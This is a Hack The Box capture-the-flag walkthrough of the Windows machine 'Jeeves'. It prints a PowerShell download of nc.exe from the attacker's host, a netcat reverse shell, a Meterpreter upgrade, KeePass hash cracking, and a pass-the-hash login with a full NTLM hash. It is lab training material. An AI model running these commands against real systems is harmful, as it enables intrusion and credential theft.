Jeeves Walkthrough(Hack The Box)

Reconnaissance #Windows

#

• We got port 135, 80, 445 open on the machine. Nmap scan reveals these

  

• On port 80 we got a web application running with a search option for articles :That was my initial impression
• Its running on windows 10 and the search option leads to an error page, surprisingly. Also it’s a SQL error.

  

• From the error page I can see get the server info

  

• I tried all the things from directory to host enumeration it all failed . The reason is I overlooked a port which is 50000. This port is also had a web page on it.

  

Enumeration

#

• On fuzzing the directories I get a hit

 ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://jeeves.htb:50000/FUZZ -t 60

• After accessing the directory I was so happy to see jenkins. Then I got access easily by injecting this following command to download nc from my my machine on the project build page.
  I have exploited jenkins multiple times in THM and HTB, It’s relatively easy to leverage jenkins for a foothold

Exploitation

#

powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.4:8000/nc.exe' -OutFile 'C:\Windows\Temp\good.exe'"

• Executed it using next build command

C:\\Windows\Temp\good.exe <ip> <port> -e cmd.executing

• Soon after getting user flag I tried this whoami /priv and saw seimpersonate set enabled and tried some of the attacks from metasploit but failed.
• Initially to transfer this shell to meterpreter I used exploit/multi/script/web_discovery for the payload windows/meterpreter/reverse_tcp cause x64 was not working.
• This above module helped me to create a meterpreter shell by presenting a command to paste in the shell session I had.
• Soon after executing the command I got meterpreter access.
• As I didn’t had any luck with potato attacks. I decided to check other directories and found a file in the Documents folder for this user. Which was CEH.kdbd.
• which is a keepass db file so typically this requires master key to unlock it.
• I used john to generate hash and then hashcat to crack it.

keepass2john CEH.kdbd >> kdbd.hash

• Then cracked the generated hash using hashcat

hashcat kdbd.hash  /usr/share/wordlists/rockyou.txt --user -m 13400

• I used --user flag as hash had a username CEH.
• I got the password which is <Redacted>

  

• I opened the db using kpcli --kdb CEH.kdbx and provided master password when it prompted

  

• Only a password hash seemed interesting to me

  

Privilege Escalation

#

• I checked the hash’s sanity as Administrator to machine’s share using crackmapexec and it was a success

crackmapexec smb 10.10.10.63 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

• Now using psexec.py I initiated pass the hash attack to get a shell
• psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63 cmd.exe

  

• Administrator’s Desktop folder had this hm.txt which said to look elsewhere for the root flag but by issuing dir /R I got to see the alternate data streams for the files.

  

  

• To read the contents of the root flag I typed more < hm.txt:root.txt